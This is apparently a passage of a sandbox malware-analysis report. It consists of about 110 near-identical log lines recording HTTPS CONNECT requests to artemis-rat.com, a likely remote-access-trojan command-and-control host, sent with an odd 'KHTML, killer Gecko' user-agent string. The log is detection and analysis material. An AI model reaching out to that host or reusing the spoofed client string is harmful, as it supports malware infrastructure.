                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.com
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
